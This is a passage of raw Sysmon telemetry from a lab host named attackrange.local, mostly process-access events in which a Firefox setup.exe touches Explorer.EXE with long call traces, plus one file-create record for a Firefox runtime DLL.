ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll2021-01-18 13:59:52.192 10341000x800000000000000014438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 